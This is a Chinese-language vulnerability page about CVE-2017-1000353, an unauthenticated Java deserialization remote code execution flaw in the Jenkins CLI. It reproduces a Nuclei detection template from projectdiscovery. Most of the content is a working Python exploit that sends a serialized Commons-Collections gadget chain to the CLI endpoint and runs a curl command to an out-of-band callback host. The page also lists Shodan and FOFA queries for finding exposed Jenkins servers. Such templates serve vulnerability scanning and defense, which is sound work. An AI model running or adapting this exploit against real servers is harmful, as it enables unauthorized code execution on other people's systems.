CVE-2017-1000353: Jenkins CLI - Java Deserialization

日期: 2025-08-01 | 影响软件: Jenkins | POC: 已公开

漏洞描述

Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.

PoC代码[已公开]

id: CVE-2017-1000353

info:
  name: Jenkins CLI - Java Deserialization
  author: hnd3884
  severity: critical
  description: |
    Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.
  reference:
    - http://packetstormsecurity.com/files/159266/Jenkins-2.56-CLI-Deserialization-Code-Execution.html
    - https://www.exploit-db.com/exploits/41965/
    - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-1000353
    cwe-id: CWE-502
    epss-score: 0.94419
    epss-percentile: 0.99977
    cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:*
  metadata:
    vendor: jenkins
    product: jenkins
    shodan-query:
      - cpe:"cpe:2.3:a:jenkins:jenkins"
      - http.favicon.hash:"81586312"
      - product:"jenkins"
      - x-jenkins
    fofa-query: icon_hash=81586312
  tags: cve,cve2017,jenkins,rce

variables:
  OAST: "{{interactsh-url}}"
  ROOTURL: "{{RootURL}}"

code:
  - engine:
      - py
      - python3
    source: |
      import requests
      import uuid
      import threading
      import time
      import os
      import struct

      CMD = 'curl https://' + os.getenv('OAST')
      URL = '%s/cli' % os.getenv('ROOTURL').rstrip('/')
      PREAMLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
      PROTO = b'\x00\x00\x00\x00'

      def java_string(s):
          length = len(s)
          packed_length = struct.pack(">H", length)
          return packed_length + s.encode()

      def download(url, session):
          headers = {'Side' : 'download'}
          headers['Content-type'] = 'application/x-www-form-urlencoded'
          headers['Session'] = session
          headers['Transfer-Encoding'] = 'chunked'
          r = requests.post(url, data=b' ', headers=headers,  stream=True, verify=False)
          print(r.content)

      def upload(url, session, data):
          headers = {'Side' : 'upload'}
          headers['Session'] = session
          headers['Content-type'] = 'application/octet-stream'
          headers['Accept-Encoding'] = None
          r = requests.post(url,data=data,headers=headers, verify=False)

      def upload_chunked(url,session):
          headers = {'Side' : 'upload'}
          headers['Session'] = session
          headers['Content-type'] = 'application/octet-stream'
          headers['Accept-Encoding']= None
          headers['Transfer-Encoding'] = 'chunked'
          headers['Cache-Control'] = 'no-cache'

          r = requests.post(url, headers=headers, data=create_payload_chunked(),  verify=False)
          print(r.content.hex())

      def create_payload_chunked():
          yield PREAMLE
          yield PROTO
          yield create_payload(CMD)

      def create_payload(cmd):
          serialized = "aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e63757272656e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537472696e673b7870757200025b42acf317f8060854e002000078700000050baced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740012746f756368202f746d702f686f616e676e64740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878787571007e00110000002f302d021439e722dbd82414a747c2de0e7d831a1264e0ab5902150084604637b41649a8ba9799fe2cc0590574cf970e740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000017704000000017400046173646678787371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078".replace("0012746f756368202f746d702f686f616e676e64",java_string(cmd).hex()).replace('050baced000573', struct.pack(">H", 1291 + len(cmd)-18).hex()  + 'aced000573')
          return bytes.fromhex(serialized)

      def main():
          session = str(uuid.uuid4())
          t = threading.Thread(target=download, args=(URL, session))
          t.start()
          time.sleep(2)
          upload_chunked(URL, session)

      main()

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4a0a00473045022073c9a60aaf2d09152c947dad4f9930fb185862421d650c9564c5ae9d776b342f022100e19948d6300a0f6e67d46ed2f94f6b9da1f30fa482309c07a0cdc3ebb489409e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/code/cves/2017/CVE-2017-1000353.yaml

相关漏洞推荐